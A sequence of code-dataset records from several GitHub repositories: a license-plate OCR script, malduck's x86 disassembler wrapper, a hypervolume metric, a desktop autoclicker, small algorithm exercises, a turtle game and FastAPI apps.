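\"\"\"\n bboxes, class_ids, 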
scores = util.NMS(bboxes, class_ids, scores)\n\n \"\"\" plot \"\"\"\n\n reader = easyocr.Reader(['en'])\n plate = False\n for bbox_, bbox in enumerate(bboxes):\n xc, yc, w, h = bbox\n\n plate = True\n license_plate = img[int(yc - (h / 2)):int(yc + (h / 2)), int(xc - (w / 2)):int(xc + (w / 2)), :].copy()\n\n img = cv2.rectangle(img,\n (int(xc - (w / 2)), int(yc - (h / 2))),\n (int(xc + (w / 2)), int(yc + (h / 2))),\n (0, 255, 0),\n 10)\n\n # output = reader.readtext(license_plate)\n # print(output)\n\n #plt.figure()\n #plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n\n #plt.figure()\n\n if plate == True:\n\n license_plate = cv2.cvtColor(license_plate, cv2.COLOR_BGR2GRAY)\n license_plate = cv2.bilateralFilter(license_plate, 11, 17, 17)\n\n cv2.imwrite(\"model/only_plate/\" + name_file, license_plate)\n cv2.imwrite(\"static/\" + name_file, license_plate)\n logger.info(\"saved new plate\")\n\n #plt.show()\n\n new_plate(name_file)\n\n else:\n logger.error(\"It's not car or something wrong...\")\n logger.info(\"I'm waiting for next image...\")\n\n\ndef new_plate(name_file):\n\n \"\"\" saved text plate in db \"\"\"\n sql_url = \"sqlite:///data.db\"\n\n temp = [\n datetime.datetime.now().strftime(\"%Y-%m-%d\"),\n datetime.datetime.now().strftime(\"%H:%M:%S\"),\n \"KR1234\",\n ' None:\n self.op = op\n self.x64 = x64\n\n @property\n def is_imm(self) -> bool:\n \"\"\"Is it immediate operand?\"\"\"\n return self.op.type == Operand._x86_op_imm\n\n @property\n def is_reg(self) -> bool:\n \"\"\"Is it register operand?\"\"\"\n return self.op.type == Operand._x86_op_reg\n\n @property\n def is_mem(self) -> bool:\n \"\"\"Is it memory operand?\"\"\"\n return self.op.type == Operand._x86_op_mem\n\n @property\n def value(self) -> Union[str, int]:\n \"\"\"\n Returns operand value or displacement value for memory operands\n\n :rtype: str or int or None\n \"\"\"\n if self.is_imm:\n return self.op.value.imm\n elif self.is_mem:\n return self.op.value.mem.disp\n elif self.is_reg:\n return self.regs[self.op.reg]\n else:\n raise Exception(\"Invalid Operand type\")\n\n @property\n def reg(self) -> Optional[Union[str, int]]:\n \"\"\"\n Returns register used by operand.\n\n For memory operands, returns base register or index register if base is not used.\n For immediate operands or displacement-only memory operands returns None.\n\n :rtype: str\n \"\"\"\n if self.is_mem:\n reg = self.op.value.mem.base or self.op.value.mem.index\n if reg:\n return self.regs[reg]\n if self.is_reg:\n return self.regs[self.op.reg]\n return None\n\n @property\n def mem(self) -> Optional[Memory]:\n \"\"\"\n Returns :class:`Memory` object for memory operands\n \"\"\"\n if not self.is_mem:\n return None\n\n mem = self.op.value.mem\n base: Optional[Union[str, int]] = None\n index: Optional[Union[str, int]] = None\n scale: Optional[int] = None\n\n if mem.base:\n base = self.regs[mem.base]\n\n if mem.index:\n index, scale = self.regs[mem.index], mem.scale\n\n return Memory(self.sizes[self.op.size], base, scale, index, mem.disp)\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Operand):\n return self.op.type == other.op.type and self.value == other.value\n if self.is_imm:\n return self.value == other\n if isinstance(other, str):\n other = (other,)\n if self.is_reg and self.reg in other:\n return True\n if self.is_mem and self.reg in other:\n return True\n return False\n\n def __str__(self) -> str:\n if self.is_imm:\n if self.x64:\n return \"0x%016x\" % (int(self.value) % 2**64)\n else:\n return \"0x%08x\" % (int(self.value) % 
2**32)\n elif self.is_reg:\n return str(self.reg)\n elif self.is_mem:\n s, m = [], self.mem\n if m is None:\n raise Exception(\"Invalid mem object\")\n if m.base:\n s.append(m.base)\n if m.index:\n s.append(\"%d*%s\" % (m.scale, m.index))\n if m.disp:\n s.append(\"0x%08x\" % (m.disp % 2**32))\n return \"%s [%s]\" % (m.size, \"+\".join(s))\n else:\n raise Exception(\"Invalid Operand type\")\n\n\nclass Instruction(object):\n \"\"\"\n Represents single instruction in :class:`Disassemble`\n\n short: insn\n\n Properties correspond to the following elements of instruction:\n\n .. code-block:: python\n\n 00400000 imul ecx, edx, 0\n [addr] [mnem] [op1], [op2], [op3]\n\n Usage example:\n\n .. code-block:: python\n\n def get_move_value(self, p, hit, *args):\n # find move value of `mov eax, x`\n for ins in p.disasmv(hit, 0x100):\n if ins.mnem == 'mov' and ins.op1.value == 'eax':\n return ins.op2.value\n\n .. seealso::\n\n :py:meth:`malduck.procmem.ProcessMemory.disasmv`\n \"\"\"\n\n def __init__(\n self,\n mnem: Optional[str] = None,\n op1: Optional[Operand] = None,\n op2: Optional[Operand] = None,\n op3: Optional[Operand] = None,\n addr: Optional[int] = None,\n x64: bool = False,\n ) -> None:\n self.insn = None\n self.mnem = mnem\n self.operands = op1, op2, op3\n self._addr = addr\n self.x64 = x64\n\n def parse(self, insn: CsInsn) -> None:\n self.insn = insn\n self.mnem = insn.mnemonic\n\n operands: List[Optional[Operand]] = []\n for op in insn.operands + [None, None, None]:\n operands.append(Operand(op, self.x64) if op else None)\n self.operands = operands[0], operands[1], operands[2]\n\n @staticmethod\n def from_capstone(insn: CsInsn, x64: bool = False) -> \"Instruction\":\n ret = Instruction()\n ret.x64 = x64\n ret.parse(insn)\n return ret\n\n @property\n def op1(self) -> Optional[Operand]:\n \"\"\"First operand\"\"\"\n return self.operands[0]\n\n @property\n def op2(self) -> Optional[Operand]:\n \"\"\"Second operand\"\"\"\n return self.operands[1]\n\n @property\n def op3(self) -> Optional[Operand]:\n \"\"\"Third operand\"\"\"\n return self.operands[2]\n\n @property\n def addr(self) -> Optional[int]:\n \"\"\"Instruction address\"\"\"\n if self._addr:\n return self._addr\n if self.insn is not None:\n return self.insn.address\n return None\n\n def __eq__(self, other: Any) -> bool:\n if not isinstance(other, Instruction):\n return False\n if self.mnem != other.mnem or self.addr != other.addr:\n return False\n if self.operands == other.operands:\n return True\n return False\n\n def __str__(self) -> str:\n operands = []\n if self.op1 is not None:\n operands.append(str(self.op1))\n if self.op2 is not None:\n operands.append(str(self.op2))\n if self.op3 is not None:\n operands.append(str(self.op3))\n if operands:\n return \"%s %s\" % (self.mnem, \", \".join(operands))\n return self.mnem or \"\"\n\n\nclass Disassemble:\n def __init__(self) -> None:\n import capstone.x86\n\n Operand._x86_op_imm = capstone.x86.X86_OP_IMM\n Operand._x86_op_reg = capstone.x86.X86_OP_REG\n Operand._x86_op_mem = capstone.x86.X86_OP_MEM\n\n # Index the available x86 registers.\n for reg in dir(capstone.x86):\n if not reg.startswith(\"X86_REG_\"):\n continue\n Operand.regs[getattr(capstone.x86, reg)] = reg.split(\"_\")[2].lower()\n\n def disassemble(\n self, data: bytes, addr: int, x64: bool = False, count: int = 0\n ) -> Iterator[Instruction]:\n \"\"\"\n Disassembles data from specific address\n\n .. 
versionchanged :: 4.0.0\n\n Returns iterator instead of list of instructions, accepts maximum\n number of instructions to disassemble\n\n short: disasm\n\n :param data: Block of data to disasseble\n :type data: bytes\n :param addr: Virtual address of data\n :type addr: int\n :param x64: Disassemble in x86-64 mode?\n :type x64: bool (default=False)\n :param count: Number of instructions to disassemble\n :type count: int (default=0)\n :return: Returns iterator of instructions\n :rtype: Iterator[:class:`Instruction`]\n \"\"\"\n import capstone\n\n cs = capstone.Cs(\n capstone.CS_ARCH_X86, capstone.CS_MODE_64 if x64 else capstone.CS_MODE_32\n )\n cs.detail = True\n for insn in cs.disasm(data, addr, count):\n yield Instruction.from_capstone(insn, x64=x64)\n\n __call__ = disassemble\n\n\ndisasm = Disassemble()\ninsn = Instruction\n","repo_name":"CERT-Polska/malduck","sub_path":"malduck/disasm.py","file_name":"disasm.py","file_ext":"py","file_size_in_byte":8484,"program_lang":"python","lang":"en","doc_type":"code","stars":284,"dataset":"github-code","pt":"61"} +{"seq_id":"26407720826","text":"from abc import ABCMeta, abstractmethod\nfrom typing import List, TypeVar\n\n\"\"\"\n.. module:: indicators\n :platform: Unix, Windows\n :synopsis: Quality indicators implementation.\n\n.. moduleauthor:: Antonio Benítez-Hidalgo , Simon Wessing\n\"\"\"\n\nS = TypeVar('S')\n\nclass Front:\n def __init__(self, objectives, variables):\n self.objectives = objectives\n self.variables = variables\n self.attributes = {}\n self.number_of_objectives = len(objectives)\n self.number_of_variables = len(variables)\n\nclass Metric:\n\n __metaclass__ = ABCMeta\n\n @abstractmethod\n def get_name(self) -> str:\n return self.__class__.__name__\n\n @abstractmethod\n def compute(self, front: List[Front]):\n pass\n\nclass HyperVolume(Metric):\n \"\"\" Hypervolume computation based on variant 3 of the algorithm in the paper:\n\n * C. M. Fonseca, L. Paquete, and M. Lopez-Ibanez. An improved dimension-sweep\n algorithm for the hypervolume indicator. 
In IEEE Congress on Evolutionary\n Computation, pages 1157-1163, Vancouver, Canada, July 2006.\n\n Minimization is implicitly assumed here!\n \"\"\"\n\n def __init__(self, reference_point: list):\n \"\"\"Constructor.\"\"\"\n self.referencePoint = reference_point\n self.list: MultiList = []\n\n def compute(self, front: List[Front]):\n \"\"\"Before the HV computation, front and reference point are translated, so\n that the reference point is [0, ..., 0].\n\n :return: The hypervolume that is dominated by a non-dominated front.\n \"\"\"\n def get_variables() -> list:\n result = []\n for solution in front:\n result.append(solution.objectives)\n\n return result\n\n front = get_variables()\n\n def weakly_dominates(point, other):\n for i in range(len(point)):\n if point[i] > other[i]:\n return False\n return True\n\n relevant_points = []\n reference_point = self.referencePoint\n dimensions = len(reference_point)\n for point in front:\n # only consider points that dominate the reference point\n if weakly_dominates(point, reference_point):\n relevant_points.append(point)\n if any(reference_point):\n # shift points so that reference_point == [0, ..., 0]\n # this way the reference point doesn't have to be explicitly used\n # in the HV computation\n for j in range(len(relevant_points)):\n relevant_points[j] = [relevant_points[j][i] - reference_point[i] for i in range(dimensions)]\n self._pre_process(relevant_points)\n bounds = [-1.0e308] * dimensions\n\n return self._hv_recursive(dimensions - 1, len(relevant_points), bounds)\n\n def _hv_recursive(self, dim_index: int, length: int, bounds: list):\n \"\"\"Recursive call to hypervolume calculation.\n\n In contrast to the paper, the code assumes that the reference point\n is [0, ..., 0]. This allows the avoidance of a few operations.\n \"\"\"\n hvol = 0.0\n sentinel = self.list.sentinel\n if length == 0:\n return hvol\n elif dim_index == 0:\n # special case: only one dimension\n # why using hypervolume at all?\n return -sentinel.next[0].cargo[0]\n elif dim_index == 1:\n # special case: two dimensions, end recursion\n q = sentinel.next[1]\n h = q.cargo[0]\n p = q.next[1]\n while p is not sentinel:\n p_cargo = p.cargo\n hvol += h * (q.cargo[1] - p_cargo[1])\n if p_cargo[0] < h:\n h = p_cargo[0]\n q = p\n p = q.next[1]\n hvol += h * q.cargo[1]\n return hvol\n else:\n remove = self.list.remove\n reinsert = self.list.reinsert\n hv_recursive = self._hv_recursive\n p = sentinel\n q = p.prev[dim_index]\n while q.cargo is not None:\n if q.ignore < dim_index:\n q.ignore = 0\n q = q.prev[dim_index]\n q = p.prev[dim_index]\n while length > 1 and (\n q.cargo[dim_index] > bounds[dim_index] or q.prev[dim_index].cargo[dim_index] >= bounds[dim_index]):\n p = q\n remove(p, dim_index, bounds)\n q = p.prev[dim_index]\n length -= 1\n q_area = q.area\n q_cargo = q.cargo\n q_prev_dim_index = q.prev[dim_index]\n if length > 1:\n hvol = q_prev_dim_index.volume[dim_index] + q_prev_dim_index.area[dim_index] * (\n q_cargo[dim_index] - q_prev_dim_index.cargo[dim_index])\n else:\n q_area[0] = 1\n q_area[1:dim_index + 1] = [q_area[i] * -q_cargo[i] for i in range(dim_index)]\n q.volume[dim_index] = hvol\n if q.ignore >= dim_index:\n q_area[dim_index] = q_prev_dim_index.area[dim_index]\n else:\n q_area[dim_index] = hv_recursive(dim_index - 1, length, bounds)\n if q_area[dim_index] <= q_prev_dim_index.area[dim_index]:\n q.ignore = dim_index\n while p is not sentinel:\n p_cargo_dim_index = p.cargo[dim_index]\n hvol += q.area[dim_index] * (p_cargo_dim_index - q.cargo[dim_index])\n 
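# The slab of hypervolume between the previous point q and the current\n                # point p has just been accumulated; now update the sweep bound and\n                # reinsert p into the lower-dimensional lists before advancing the\n                # sweep along dimension dim_index.\n                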
bounds[dim_index] = p_cargo_dim_index\n reinsert(p, dim_index, bounds)\n length += 1\n q = p\n p = p.next[dim_index]\n q.volume[dim_index] = hvol\n if q.ignore >= dim_index:\n q.area[dim_index] = q.prev[dim_index].area[dim_index]\n else:\n q.area[dim_index] = hv_recursive(dim_index - 1, length, bounds)\n if q.area[dim_index] <= q.prev[dim_index].area[dim_index]:\n q.ignore = dim_index\n hvol -= q.area[dim_index] * q.cargo[dim_index]\n return hvol\n\n def _pre_process(self, front):\n \"\"\"Sets up the list front structure needed for calculation.\"\"\"\n dimensions = len(self.referencePoint)\n node_list = MultiList(dimensions)\n nodes = [MultiList.Node(dimensions, point) for point in front]\n for i in range(dimensions):\n self._sort_by_dimension(nodes, i)\n node_list.extend(nodes, i)\n self.list = node_list\n\n def _sort_by_dimension(self, nodes, i):\n \"\"\"Sorts the list of nodes by the i-th value of the contained points.\"\"\"\n # build a list of tuples of (point[i], node)\n decorated = [(node.cargo[i], node) for node in nodes]\n # sort by this value\n decorated.sort(key=lambda n: n[0])\n # write back to original list\n nodes[:] = [node for (_, node) in decorated]\n\n def get_name(self) -> str:\n return 'Hypervolume'\n\n\nclass MultiList:\n \"\"\"A special front structure needed by FonsecaHyperVolume.\n\n It consists of several doubly linked lists that share common nodes. So,\n every node has multiple predecessors and successors, one in every list.\n \"\"\"\n\n class Node:\n\n def __init__(self, number_lists, cargo=None):\n self.cargo = cargo\n self.next = [None] * number_lists\n self.prev = [None] * number_lists\n self.ignore = 0\n self.area = [0.0] * number_lists\n self.volume = [0.0] * number_lists\n\n def __str__(self):\n return str(self.cargo)\n\n def __init__(self, number_lists):\n \"\"\" Builds 'numberLists' doubly linked lists.\n \"\"\"\n self.number_lists = number_lists\n self.sentinel = MultiList.Node(number_lists)\n self.sentinel.next = [self.sentinel] * number_lists\n self.sentinel.prev = [self.sentinel] * number_lists\n\n def __str__(self):\n strings = []\n for i in range(self.number_lists):\n current_list = []\n node = self.sentinel.next[i]\n while node != self.sentinel:\n current_list.append(str(node))\n node = node.next[i]\n strings.append(str(current_list))\n string_repr = \"\"\n for string in strings:\n string_repr += string + \"\\n\"\n return string_repr\n\n def __len__(self):\n \"\"\"Returns the number of lists that are included in this MultiList.\"\"\"\n return self.number_lists\n\n def get_length(self, i):\n \"\"\"Returns the length of the i-th list.\"\"\"\n length = 0\n sentinel = self.sentinel\n node = sentinel.next[i]\n while node != sentinel:\n length += 1\n node = node.next[i]\n return length\n\n def append(self, node, index):\n \"\"\" Appends a node to the end of the list at the given index.\"\"\"\n last_but_one = self.sentinel.prev[index]\n node.next[index] = self.sentinel\n node.prev[index] = last_but_one\n # set the last element as the new one\n self.sentinel.prev[index] = node\n last_but_one.next[index] = node\n\n def extend(self, nodes, index):\n \"\"\" Extends the list at the given index with the nodes.\"\"\"\n sentinel = self.sentinel\n for node in nodes:\n last_but_one = sentinel.prev[index]\n node.next[index] = sentinel\n node.prev[index] = last_but_one\n # set the last element as the new one\n sentinel.prev[index] = node\n last_but_one.next[index] = node\n\n def remove(self, node, index, bounds):\n \"\"\" Removes and returns 'node' from all lists in 
[0, 'index'[.\"\"\"\n for i in range(index):\n predecessor = node.prev[i]\n successor = node.next[i]\n predecessor.next[i] = successor\n successor.prev[i] = predecessor\n if bounds[i] > node.cargo[i]:\n bounds[i] = node.cargo[i]\n return node\n\n def reinsert(self, node, index, bounds):\n \"\"\" Inserts 'node' at the position it had in all lists in [0, 'index'[\n before it was removed. This method assumes that the next and previous\n nodes of the node that is reinserted are in the list.\n \"\"\"\n for i in range(index):\n node.prev[i].next[i] = node\n node.next[i].prev[i] = node\n if bounds[i] > node.cargo[i]:\n bounds[i] = node.cargo[i]\n","repo_name":"LuckysonKhaidem/HyperVolume-Maximization","sub_path":"hypervolume.py","file_name":"hypervolume.py","file_ext":"py","file_size_in_byte":10542,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"25965987861","text":"import threading\nfrom pyautogui import *\nimport pyautogui\nimport time, keyboard, threading\nimport win32api, win32con, win32gui\n\n# Clicks per second\ncps = 10\n\n\n# Click function, will click where x and y are set\ndef click ():\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTDOWN,0,0)\n time.sleep(0.001) # Pause script for 0.01 seconds for mouse down to register\n win32api.mouse_event(win32con.MOUSEEVENTF_LEFTUP,0,0)\n\ndef set_speed():\n global current_option\n # Prompt\n print(\"Choose your clicks per second for the program\")\n\n # Reset value\n global cps\n cps = 0\n\n # Make sure value is integer\n while (cps == 0):\n if (current_option == 0):\n break\n try:\n cps = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"Your clicks per second are now \"+str(cps))\n current_option = 0 \n print(\"Select a new option\")\n \n# Spam button\ndef click_mouse():\n global cps\n click()\n check_end()\n\n# Click position variables\ndef click_positions():\n global cps\n global current_option\n state_left = win32api.GetKeyState(0x01) # Left button up = 0 or 1. 
Button down = -127 or -128\n let_go = True\n positions = []\n\n # Prompt\n print(\"Click on the positions you would like to select, press alt+3 to end\")\n\n # Wait to let go \n while keyboard.is_pressed('alt+3'):\n pass\n \n # Get options\n while (keyboard.is_pressed('alt+3') == False):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n positions.append(win32gui.GetCursorPos())\n let_go = False\n print(len(positions))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n\n print(\"Your positions have been chosen\")\n while (current_option != 0):\n for i in range(len(positions)):\n if (current_option == 0):\n break\n win32api.SetCursorPos(positions[i])\n click()\n time.sleep((1/cps))\n\ndef click_colors():\n global cps\n global current_option\n color_option = 0\n positions = []\n\n print(\"Would you like to click colors within an area, or within certain positions (alt+1 for first option, alt+2 for second):\")\n\n option_picked = False\n while (option_picked == False):\n if (keyboard.is_pressed('alt+1')):\n color_option = 1\n option_picked = True\n elif(keyboard.is_pressed('alt+2')):\n color_option = 2\n option_picked = True\n \n if (color_option == 1):\n print(\"Select the top left and bottom right positions that you would like to search for colors in\")\n let_go = True\n tuples=[]\n pos = []\n while (len(tuples) < 2):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n tuples.append(win32gui.GetCursorPos())\n let_go = False\n print(len(tuples))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n # test print of positions\n print(tuples)\n\n # Convert tuples to just lists\n for i in range(2):\n pos.append([])\n pos[i].append(tuples[i][0])\n pos[i].append(tuples[i][1])\n \n # Swap x and y positions to correct sections\n # Swap x\n if (pos[0][0] < pos[1][0]): \n temp = pos[0][0] # record lower x\n pos[0][0] = pos[1][0] # Set higher x\n pos[1][0] = temp # Set lower x\n # Swap y\n print(pos[0][1] < pos[1][1])\n if (pos[0][1] < pos[1][1]): \n temp = pos[0][1] #record lower y\n pos[0][1] = pos[1][1] # Set higher y\n pos[1][1] = temp # Set lower y\n print(pos)\n\n print(\"How many pixels would you like to skip over when checking for colors (Lower numbers check more pixels but is slower)\")\n\n speed = -1\n while (speed < 0):\n if (current_option == 0):\n break\n try:\n speed = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"You picked \"+str(speed))\n\n # Get pixel positions\n # for x in range(pos[1][0], pos[0][0], speed):\n # for y in range(pos[1][1], pos[0][1], speed):\n # positions.append([x,y])\n\n elif (color_option == 2):\n print(\"Click on the positions you would like to check, press (alt+4) to finish\")\n let_go = True\n while (keyboard.is_pressed('alt+4') == False):\n if (current_option == 0):\n break\n a = win32api.GetKeyState(0x01)\n if (a == -127 or a == -128) and let_go: # Pessing button and also let go already\n positions.append(win32gui.GetCursorPos())\n let_go = False\n print(len(positions))\n elif (a == 0 or a == 1) and let_go == False:\n let_go = True\n\n print(\"Hover over the colors you would like for the program to click on and press (alt+1), press (alt+2) when you are done\")\n colors = []\n let_go = True\n while (keyboard.is_pressed('alt+2') == False):\n if (current_option == 0):\n break\n if 
(keyboard.is_pressed('alt+1') and let_go):\n let_go = False\n length = len(colors)\n # colors.append(pyautogui.pixel(pyautogui.position()[0], pyautogui.position()[1]))\n while (length == len(colors)):\n if (current_option == 0):\n break\n print(length == len(colors))\n try:\n colors.append(pyautogui.pixel(pyautogui.position()[0], pyautogui.position()[1]))\n except:\n pass\n print(colors)\n let_go = not keyboard.is_pressed('alt+1')\n\n \n print(\"Would you like a delay after clicking to prevent misclicks\")\n delay = -1\n while (delay == -1):\n if (current_option == 0):\n break\n try:\n delay = int(input(\"Input an integer\"))\n except ValueError:\n print(\"That is not a valid integer\")\n print(\"The program is now searching the area and clicking when it finds the color\")\n if (color_option == 1):\n while (current_option != 0):\n flag = 0\n pic = pyautogui.screenshot(region=(pos[1][0], pos[1][1], pos[0][0]-pos[1][0], pos[0][1]-pos[1][1]))\n\n width, height = pic.size\n for x in range(0, width, speed):\n for y in range(0, height, speed):\n \n if (current_option == 0): \n break\n current_color = pic.getpixel((x, y))\n for i in range(len(colors)):\n if (current_color == colors[i]):\n win32api.SetCursorPos((x+pos[1][0], y+pos[1][1]))\n click()\n flag = 1\n break\n if (flag == 1): break\n \n if (flag == 1): \n break\n \n \n elif (color_option == 2):\n while (current_option != 0):\n for i in range(len(positions)):\n if (current_option == 0):\n break\n current_color = 0\n while (current_color == 0):\n try:\n current_color = (pyautogui.pixel(positions[i][0], positions[i][1]))\n except:\n pass\n for p in range(len(colors)):\n if (current_color == colors[p]):\n win32api.SetCursorPos((positions[i][0], positions[i][1]))\n click()\n \n\n\n\noptions = {\n 1:set_speed,\n 2:click_mouse,\n 3:click_positions,\n 4:click_colors\n}\n\n\ncurrent_option = 0\n\ndef check_end():\n global current_option\n \n # Check for alt+0\n if (keyboard.is_pressed('alt+0')):\n \n current_option = 0\n print(\"Select a new option\")\n \n\n\n# Main program\ndef main():\n global current_option\n print(\"Welcome to PyClicker\")\n print(\"Options:\")\n print(\"(alt+1) Set speed\")\n print(\"(alt+2) Click mouse button\")\n print(\"(alt+3) Click mouse at preset positions\")\n print(\"(alt+4) Click certain colors within a position\")\n print(\"(alt+9) End program\")\n print(\"(alt+0) Stop current selection\")\n program_end = False\n while (program_end == False):\n \n if current_option != 0:\n options[current_option]()\n \n if (current_option != 4):\n time.sleep((1/cps))\n \ndef monitor_keyboard():\n global current_option\n \n while (1):\n if (current_option == 0):\n for i in range(10):\n if (keyboard.is_pressed('alt+'+str(i)) and not keyboard.is_pressed('alt+0')): \n current_option = i\n print(\"You picked option \"+str(i))\n # Check for alt+0\n if (keyboard.is_pressed('alt+0') and current_option != 0):\n current_option = 0\n print(\"Select a new option\")\n print(\"Options:\")\n print(\"(alt+1) Set speed\")\n print(\"(alt+2) Click mouse button\")\n print(\"(alt+3) Click mouse at preset positions\")\n print(\"(alt+4) Click certain colors within a position\")\n print(\"(alt+9) End program\")\n print(\"(alt+0) Stop current selection\")\n\n#Start threads\nt1 = threading.Thread(target=main, args=())\nt2 = threading.Thread(target=monitor_keyboard, 
args=())\nt1.start()\nt2.start()\n\n","repo_name":"luwaidev/PyClicker","sub_path":"Testing/clicker_console.py","file_name":"clicker_console.py","file_ext":"py","file_size_in_byte":10159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31149410734","text":"from sys import stdin,stdout\n##stdin=open('/Users/atulkhetan/Desktop/input.txt','r')\n##stdout=open('/Users/atulkhetan/Desktop/output.txt','w')\nfor _ in xrange(int(stdin.readline())):\n x,n=map(int,stdin.readline().split())\n sum_ans=((n*(n+1))/2)-x\n if sum_ans%2==0 and n>3:\n to_find=sum_ans/2\n till = to_find\n for i in xrange(n,0,-1):\n if i==x:\n continue\n to_find-=i\n if i-1>=to_find:\n till=i\n break\n array=[0]*(n+1)\n for i in xrange(till,n+1):\n array[i]=1\n array[to_find]=1\n array[x]=2\n if x==to_find:\n ##for x==1 and x==2\n \n if x==2 :\n array[till]=0\n array[till-1]=1\n array[3]=1\n elif x==1:\n array[till]=0\n array[till-1]=1\n array[2]=1\n else:\n array[1]=1\n array[x-1]=1\n for i in xrange(1,n+1):\n stdout.write(\"%d\"%(array[i]))\n stdout.write(\"\\n\")\n else:\n stdout.write(\"impossible\\n\")\n##stdin.close()\n##stdout.close()\n \n","repo_name":"phantomhieve/CP","sub_path":"2018/janurary(18) long/5.py","file_name":"5.py","file_ext":"py","file_size_in_byte":1184,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9075830312","text":"\r\ndef convert(string):\r\n new = \"|\"\r\n for ch in string:\r\n new += ch+\"|\"\r\n return new\r\n\r\ndef longest_palindrom(string):\r\n n = len(string)*2 + 1 \r\n lps = [0 for i in range(n)]\r\n new = convert(string)\r\n lps[1] = 1\r\n center = 1\r\n right = 2\r\n \r\n max_len = 0\r\n max_center = -1\r\n\r\n for i in range(2,n):\r\n mirror = center - (i - center)\r\n lps[i] = 0\r\n dist = right - i\r\n if dist > 0:\r\n lps[i] = min(lps[mirror], dist)\r\n \r\n while (i + lps[i] + 1 < n) and (i - lps[i] - 1 > 0) and \\\r\n (i + lps[i] + 1 % 2 == 0 or new[(i+lps[i]+1)] == new[i-lps[i]-1]):\r\n lps[i] += 1\r\n\r\n if lps[i] > max_len:\r\n max_len = lps[i]\r\n max_center = i \r\n\r\n if i + lps[i] > right:\r\n center = i\r\n right = i + lps[i]\r\n\r\n if max_center % 2 == 1:\r\n off = (max_len - 1)//2\r\n length = 2*off+1\r\n else:\r\n off = max_len//2\r\n length = 2*off\r\n start = (max_center)//2 - off\r\n print(string[start:start+length])\r\n return start, length\r\n \r\nif __name__ == \"__main__\":\r\n for i in (\"babcbabcbaccba\",\"abacdfgdcaba\",\"abacdfgdcabba\",\"forgeeksskeegfor\"):\r\n longest_palindrom(i)","repo_name":"infinitevoid/algorithms","sub_path":"py/algo/dynamic/substring/longest_palindromic.py","file_name":"longest_palindromic.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10141339317","text":"import os\nimport requests\nfrom fastapi import FastAPI,File\nfrom tortoise.contrib.fastapi import register_tortoise\n\n\nfrom .api.endpoints.dogs import dogs\nfrom .api.endpoints.users import users\nfrom .api.authentication import auth\n\n\nconfig=['PSQL_USER','PSQ_PSSW','PSQL_HOST','PSQL_DB']\nuser,pssw,host,db=[os.getenv(i) for i in config]\n\n\napp = FastAPI(title='GUANE TEST',version='0.1')\n\n\nregister_tortoise(\n app,\n db_url=f'postgres://{user}:{pssw}@{host}/{db}',\n modules={\"models\": [\"backend.app.api.models\"]},\n generate_schemas=True,\n add_exception_handlers=True,\n) \n\n\n\n@app.get(\"/\")\nasync def read_root():\n return 
{\"Status\": \"Working\"}\n\n\napp.include_router(auth)\napp.include_router(users)\napp.include_router(dogs)\n\n@app.post(\"/api/files\",tags=[\"Files\"])\nasync def read_root(file:bytes=File(...)):\n response=requests.post('https://gttb.guane.dev/api/files',files={'file':file})\n response = response.json() if response.status_code ==201 else response.reason\n return response","repo_name":"santiagossz/guane-intern-fastapi","sub_path":"backend/app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"72951325633","text":"#!/usr/bin/env python3\n\nimport time\nfrom turtle import Screen\nfrom game_logic.player import Player\nfrom game_logic.car_manager import CarManager\nfrom game_logic.scoreboard import Scoreboard\n\nscreen = Screen()\nscreen.title(\"Turtle Crossing Road\")\nscreen.setup(width=600, height=600)\nscreen.bgcolor(\"white\")\nscreen.tracer(0)\nscreen.listen()\n\ntommy = Player()\nscreen.onkey(key=\"Up\", fun=tommy.move_forward)\n\nscore = Scoreboard()\ncar = CarManager()\n\ngame_is_on = True\nwhile game_is_on:\n score.score_display()\n time.sleep(0.1)\n screen.update()\n\n car.create_cars()\n car.move()\n\n for i in car.all_cars:\n if i.distance(tommy.pos()) < 20:\n game_is_on = False\n score.game_over()\n\n if tommy.ycor() == 280:\n tommy.reset_player()\n car.increase_speed()\n score.CURRENT_LEVEL += 1\n\nscreen.exitonclick()\n","repo_name":"gabrielvictorio/PythonBootcamp","sub_path":"turtle_crossing_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":858,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26727322419","text":"from fastapi import FastAPI, Request\n\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom fastapi.middleware.gzip import GZipMiddleware\nfrom fastapi.responses import HTMLResponse\nfrom pydantic import BaseModel\nfrom textblob import TextBlob\nfrom fastapi import Body\nfrom dotenv import dotenv_values\n\n\nimport itertools\nimport collections\nimport sys\nimport os\nimport pymssql\nimport json\nimport nltk\nimport random\nimport string\n\nfrom text_processing import TextProcessing\nfrom sensitive_words_marking import SensitiveWordsMarking\nfrom transcribe import Transcribe\nfrom naivebayes import NaiveBayes\n\n\nconfig = dotenv_values(\".env\")\n# connection_string = f\"DRIVER={{SQL Server}};HOST={config['SERVER']};DATABASE={config['DATABASE']};UID={config['USERNAME']};PWD={config['PASSWORD']}\"\n\n# Create the connection to SQL SERVER\nconn = pymssql.connect(\n server=config[\"SERVER\"],\n database=config[\"DATABASE\"],\n port=config[\"PORT\"],\n user=config[\"USERNAME\"],\n password=config[\"PASSWORD\"],\n)\n# conn = pymssql.connect(\n# connection_string\n# )\ncursor = 